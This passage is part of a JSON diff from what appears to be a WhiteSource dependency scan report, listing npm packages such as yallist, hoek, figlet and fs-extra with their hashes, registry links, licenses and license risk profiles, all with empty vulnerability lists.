"artifactId": "yallist-3.1.1.tgz", + "version": "3.1.1", + "groupId": "yallist", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/69b2d6fa-ea6a-4d1b-b9e4-68255dad8242" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "238b1c58-bb52-4c16-90d4-e1240484f575", + "keyId": 27664950, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-modules-values/-/postcss-modules-values-3.0.0.tgz", + "homePage": "https://github.com/css-modules/postcss-modules-values#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-modules-values" + }, + "matchType": "SHA1", + "sha1": "5b5000d6ebae29b4255301b4a3a54574423e7f10", + "name": "postcss-modules-values-3.0.0.tgz", + "artifactId": "postcss-modules-values-3.0.0.tgz", + "version": "3.0.0", + "groupId": "postcss-modules-values", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b67bb96d-b35c-45a9-a1c0-bc03c5786432" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "884664e0-b292-479a-af3c-56b8df40e7d7", + "keyId": 26955200, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/restore-cursor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/restore-cursor" + }, + "matchType": "SHA1", + "sha1": "34661f46886327fed2991479152252df92daa541", + "name": "restore-cursor-1.0.1.tgz", + "artifactId": "restore-cursor-1.0.1.tgz", + "version": "1.0.1", + "groupId": "restore-cursor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/restore-cursor/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "91d7d7a2-08da-4c34-9df7-d6ec145e1560", + "keyId": 27295082, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hoek/-/hoek-6.1.3.tgz", + "homePage": "https://github.com/hapijs/hoek#readme", + "genericPackageIndex": "https://www.npmjs.org/package/hoek" + }, + "matchType": "SHA1", + "sha1": "73b7d33952e01fe27a38b0457294b79dd8da242c", + "name": "hoek-6.1.3.tgz", + "artifactId": "hoek-6.1.3.tgz", + "version": "6.1.3", + "groupId": "hoek", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/94cef291-26d7-40fe-94af-7df6b83bc359" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "77716bbd-c6c2-410a-8ebd-837ce38c7d80", + "keyId": 27100480, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-color-rebeccapurple/-/postcss-color-rebeccapurple-4.0.1.tgz", + "homePage": "https://github.com/postcss/postcss-color-rebeccapurple#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-color-rebeccapurple" + }, + "matchType": "SHA1", + "sha1": "c7a89be872bb74e45b1e3022bfe5748823e6de77", + "name": "postcss-color-rebeccapurple-4.0.1.tgz", + "artifactId": "postcss-color-rebeccapurple-4.0.1.tgz", + "version": "4.0.1", + "groupId": "postcss-color-rebeccapurple", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-color-rebeccapurple" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5ede88fe-7073-445c-8d79-fd492c910676", + "keyId": 26964128, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hoek/-/hoek-5.0.4.tgz", + "homePage": "https://github.com/hapijs/hoek#readme", + "genericPackageIndex": "https://www.npmjs.org/package/hoek" + }, + "matchType": "SHA1", + "sha1": "0f7fa270a1cafeb364a4b2ddfaa33f864e4157da", + "name": "hoek-5.0.4.tgz", + "artifactId": "hoek-5.0.4.tgz", + "version": "5.0.4", + "groupId": "hoek", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/hoek/v/5.0.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6a32de66-cafa-4999-9afc-9c4ba74fce16", + "keyId": 26963118, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/colornames/-/colornames-1.1.1.tgz", + "homePage": "https://github.com/timoxley/colornames#readme", + "genericPackageIndex": "https://www.npmjs.org/package/colornames" + }, + "matchType": "SHA1", + "sha1": "f8889030685c7c4ff9e2a559f5077eb76a816f96", + "name": "colornames-1.1.1.tgz", + "artifactId": "colornames-1.1.1.tgz", + "version": "1.1.1", + "groupId": "colornames", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/colornames/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d31d1d9-ceea-4769-a49d-76d901f20fdb", + "keyId": 28036659, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/figlet/-/figlet-1.2.4.tgz", + "homePage": "https://github.com/patorjk/figlet.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/figlet" + }, + "matchType": "SHA1", + "sha1": "2d2f48b61a77418ba6cbd9db2e25da27efee16d0", + "name": "figlet-1.2.4.tgz", + "artifactId": "figlet-1.2.4.tgz", + "version": "1.2.4", + "groupId": "figlet", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6631fe37-8e68-48af-92c5-6bd4cce81879" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8b56cbaf-8c6d-4941-8016-c1bebdba70cf", + "keyId": 27253203, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", + "homePage": "https://mths.be/cssesc", + "genericPackageIndex": "https://www.npmjs.org/package/cssesc" + }, + "matchType": "SHA1", + "sha1": "37741919903b868565e1c09ea747445cd18983ee", + "name": "cssesc-3.0.0.tgz", + "artifactId": "cssesc-3.0.0.tgz", + "version": "3.0.0", + "groupId": "cssesc", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dc0c6042-1bb9-4b45-b882-9a6617d087ae" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "76128080-2335-434b-9fdb-53dcd1bba241", + "keyId": 28224783, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/colors/-/colors-1.4.0.tgz", + "homePage": "https://github.com/Marak/colors.js", + "genericPackageIndex": "https://www.npmjs.org/package/colors" + }, + "matchType": "SHA1", + "sha1": "c50491479d4c1bdaed2c9ced32cf7c7dc2360f78", + "name": "colors-1.4.0.tgz", + "artifactId": "colors-1.4.0.tgz", + "version": "1.4.0", + "groupId": "colors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/colors/v/1.4.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "318a939e-db6e-4485-be32-8c923c5d5a35", + "keyId": 26957195, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/globby/-/globby-7.1.1.tgz", + "homePage": "https://github.com/sindresorhus/globby#readme", + "genericPackageIndex": "https://www.npmjs.org/package/globby" + }, + "matchType": "SHA1", + "sha1": "fb2ccff9401f8600945dfada97440cca972b8680", + "name": "globby-7.1.1.tgz", + "artifactId": "globby-7.1.1.tgz", + "version": "7.1.1", + "groupId": "globby", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/globby/v/7.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d8f564a6-3925-46df-a69e-af501bb8a89f", + "keyId": 27007691, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ast-types/-/ast-types-0.7.8.tgz", + "homePage": "http://github.com/benjamn/ast-types", + "genericPackageIndex": "https://www.npmjs.org/package/ast-types" + }, + "matchType": "SHA1", + "sha1": "902d2e0d60d071bdcd46dc115e1809ed11c138a9", + "name": "ast-types-0.7.8.tgz", + "artifactId": "ast-types-0.7.8.tgz", + "version": "0.7.8", + "groupId": "ast-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ast-types" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "555ef52c-8542-4efa-ab87-27a66bdbf570", + "keyId": 26967832, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/external-editor/-/external-editor-1.1.1.tgz", + "homePage": "https://github.com/mrkmg/node-external-editor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/external-editor" + }, + "matchType": "SHA1", + "sha1": "12d7b0db850f7ff7e7081baf4005700060c4600b", + "name": "external-editor-1.1.1.tgz", + "artifactId": "external-editor-1.1.1.tgz", + "version": "1.1.1", + "groupId": "external-editor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/external-editor" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a5ea3968-66f9-4127-8442-670e7af7eb96", + "keyId": 27025787, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fs-extra/-/fs-extra-7.0.1.tgz", + "homePage": "https://github.com/jprichardson/node-fs-extra", + "genericPackageIndex": "https://www.npmjs.org/package/fs-extra" + }, + "matchType": "SHA1", + "sha1": "4f189c44aa123b895f722804f55ea23eadc348e9", + "name": "fs-extra-7.0.1.tgz", + "artifactId": "fs-extra-7.0.1.tgz", + "version": "7.0.1", + "groupId": "fs-extra", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fs-extra" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b80e1739-dde4-44ce-890e-e7f35e69fffd", + "keyId": 28432134, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-list-group/-/honeyui-list-group-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/list-group#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-list-group" + }, + "matchType": "SHA1", + "sha1": "2dd9d3ec0a6c1dad654f5a89a4b0c280947fd1aa", + "name": "honeyui-list-group-1.1.1.tgz", + "artifactId": "honeyui-list-group-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-list-group", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d37663f8-9f55-45f7-84d9-cedca9175044", + "keyId": 27287352, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-double-position-gradients/-/postcss-double-position-gradients-1.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-double-position-gradients#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-double-position-gradients" + }, + "matchType": "SHA1", + "sha1": "fc927d52fddc896cb3a2812ebc5df147e110522e", + "name": "postcss-double-position-gradients-1.0.0.tgz", + "artifactId": "postcss-double-position-gradients-1.0.0.tgz", + "version": "1.0.0", + "groupId": "postcss-double-position-gradients", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8f8dd4d2-b48c-4e35-9fad-671d41a7ef31" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bc491fb4-47d0-4bdb-87fd-d8c8bcd77581", + "keyId": 26958807, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.trimend/-/lodash.trimend-4.5.1.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.trimend" + }, + "matchType": "SHA1", + "sha1": "12804437286b98cad8996b79414e11300114082f", + "name": "lodash.trimend-4.5.1.tgz", + "artifactId": "lodash.trimend-4.5.1.tgz", + "version": "4.5.1", + "groupId": "lodash.trimend", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.trimend" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5df56abb-91da-4365-8bde-f6b6c023711f", + "keyId": 28084498, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lru_map/-/lru_map-0.3.3.tgz", + "homePage": "https://github.com/rsms/js-lru#readme", + "genericPackageIndex": "https://www.npmjs.org/package/lru_map" + }, + "matchType": "SHA1", + "sha1": "b5c8351b9464cbd750335a79650a0ec0e56118dd", + "name": "lru_map-0.3.3.tgz", + "artifactId": "lru_map-0.3.3.tgz", + "version": "0.3.3", + "groupId": "lru_map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lru_map/v/0.3.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3792ed7d-6005-4db2-a72a-68b6a4ea0581", + "keyId": 26966822, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/invert-kv/-/invert-kv-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/invert-kv#readme", + "genericPackageIndex": "https://www.npmjs.org/package/invert-kv" + }, + "matchType": "SHA1", + "sha1": "7393f5afa59ec9ff5f67a27620d11c226e3eec02", + "name": "invert-kv-2.0.0.tgz", + "artifactId": "invert-kv-2.0.0.tgz", + "version": "2.0.0", + "groupId": "invert-kv", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/invert-kv" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4c4ebc4a-8575-4a7e-8a8b-bf5afdd31ec5", + "keyId": 28432162, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/markdown-cli/-/markdown-cli-1.6.0.tgz", + "homePage": "https://github.com/cilice/markdown-cli#readme", + "genericPackageIndex": "https://www.npmjs.org/package/markdown-cli" + }, + "matchType": "SHA1", + "sha1": "1c169b1c5ee238981ebbd2d3a21f1285d3de9dde", + "name": "markdown-cli-1.6.0.tgz", + "artifactId": "markdown-cli-1.6.0.tgz", + "version": "1.6.0", + "groupId": "markdown-cli", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f0bca8ab-076e-47c2-9f4b-ff8b94c2b16e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5110bda3-9a14-40e9-b1b2-5f1d53d982ee", + "keyId": 27100083, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/winston-transport/-/winston-transport-4.3.0.tgz", + "homePage": "https://github.com/winstonjs/winston-transport#readme", + "genericPackageIndex": "https://www.npmjs.org/package/winston-transport" + }, + "matchType": "SHA1", + "sha1": "df68c0c202482c448d9b47313c07304c2d7c2c66", + "name": "winston-transport-4.3.0.tgz", + "artifactId": "winston-transport-4.3.0.tgz", + "version": "4.3.0", + "groupId": "winston-transport", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/fa287a64-cc87-4bf3-8300-fccc2bc2a9cf" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "913817ed-e026-4f9d-b804-62b2c29da898", + "keyId": 27440596, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jwk-to-pem/-/jwk-to-pem-2.0.1.tgz", + "homePage": "https://github.com/Brightspace/node-jwk-to-pem#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jwk-to-pem" + }, + "matchType": "SHA1", + "sha1": "5dec71e26de741c17d28849f92ca51c762bc48a0", + "name": "jwk-to-pem-2.0.1.tgz", + "artifactId": "jwk-to-pem-2.0.1.tgz", + "version": "2.0.1", + "groupId": "jwk-to-pem", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2c500fe2-3c10-46d6-97dd-6a009634baa5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "06d34dbf-c307-4533-8dd2-e21cc687cdf6", + "keyId": 28084475, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/devalue/-/devalue-2.0.0.tgz", + "homePage": "https://github.com/Rich-Harris/devalue#readme", + "genericPackageIndex": "https://www.npmjs.org/package/devalue" + }, + "matchType": "SHA1", + "sha1": "2afa0b7c1bb35bebbef792498150663fdcd33c68", + "name": "devalue-2.0.0.tgz", + "artifactId": "devalue-2.0.0.tgz", + "version": "2.0.0", + "groupId": "devalue", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ac281c0e-3060-4d59-97ef-3a8612da5bf4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7d5e38f1-f1a1-4776-bef1-637c4629613b", + "keyId": 26963114, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/one-time/-/one-time-0.0.4.tgz", + "homePage": "https://github.com/unshiftio/one-time", + "genericPackageIndex": "https://www.npmjs.org/package/one-time" + }, + "matchType": "SHA1", + "sha1": "f8cdf77884826fe4dff93e3a9cc37b1e4480742e", + "name": "one-time-0.0.4.tgz", + "artifactId": "one-time-0.0.4.tgz", + "version": "0.0.4", + "groupId": "one-time", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1d5992ea-b777-42cd-8da4-ebf41754f5fc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "49b47d26-c746-43ff-9999-3d6caac197f4", + "keyId": 28389865, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-docker/-/is-docker-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-docker#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-docker" + }, + "matchType": "SHA1", + "sha1": "2cb0df0e75e2d064fe1864c37cdeacb7b2dcf25b", + "name": "is-docker-2.0.0.tgz", + "artifactId": "is-docker-2.0.0.tgz", + "version": "2.0.0", + "groupId": "is-docker", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dffff634-9b4e-453f-9dee-a8bed0c107b1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2012377e-d95e-453e-a6fe-d6ecf42d46c8", + "keyId": 28330900, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/csstype/-/csstype-2.6.7.tgz", + "homePage": "https://github.com/frenic/csstype#readme", + "genericPackageIndex": "https://www.npmjs.org/package/csstype" + }, + "matchType": "SHA1", + "sha1": "20b0024c20b6718f4eda3853a1f5a1cce7f5e4a5", + "name": "csstype-2.6.7.tgz", + "artifactId": "csstype-2.6.7.tgz", + "version": "2.6.7", + "groupId": "csstype", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/csstype/v/2.6.7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "963ec78e-6257-47f3-9a7c-7c621f2f84da", + "keyId": 27874960, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@types/inquirer/-/inquirer-6.5.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@types/inquirer" + }, + "matchType": "SHA1", + "sha1": "b83b0bf30b88b8be7246d40e51d32fe9d10e09be", + "name": "inquirer-6.5.0.tgz", + "artifactId": "inquirer-6.5.0.tgz", + "version": "6.5.0", + "groupId": "@types/inquirer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@types/inquirer/v/6.5.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "62997871-0d81-42ab-9e28-335e85888739", + "keyId": 28432136, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-nav/-/honeyui-nav-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/nav#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-nav" + }, + "matchType": "SHA1", + "sha1": "1f62b710dd67185500f6d49a905d137396a313d6", + "name": "honeyui-nav-1.1.1.tgz", + "artifactId": "honeyui-nav-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-nav", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "921591c2-01cc-4567-a399-1bc415cb30fd", + "keyId": 28432183, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-icons/-/honeyui-icons-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/icons#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-icons" + }, + "matchType": "SHA1", + "sha1": "ebe846de80d51f0551303176f47b201fd15d6c53", + "name": "honeyui-icons-1.3.0.tgz", + "artifactId": "honeyui-icons-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui-icons", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0ab0984b-f876-4bc2-a616-64e3e37feae5", + "keyId": 27713920, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/open/-/open-6.4.0.tgz", + "homePage": "https://github.com/sindresorhus/open#readme", + "genericPackageIndex": "https://www.npmjs.org/package/open" + }, + "matchType": "SHA1", + "sha1": "5c13e96d0dc894686164f18965ecfe889ecfc8a9", + "name": "open-6.4.0.tgz", + "artifactId": "open-6.4.0.tgz", + "version": "6.4.0", + "groupId": "open", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ce73ccfc-2e5b-4c10-a318-b3daee5ba02c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "68a8731c-5d18-4df6-9b61-30169271e87e", + "keyId": 26975272, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/chalk/-/chalk-1.1.1.tgz", 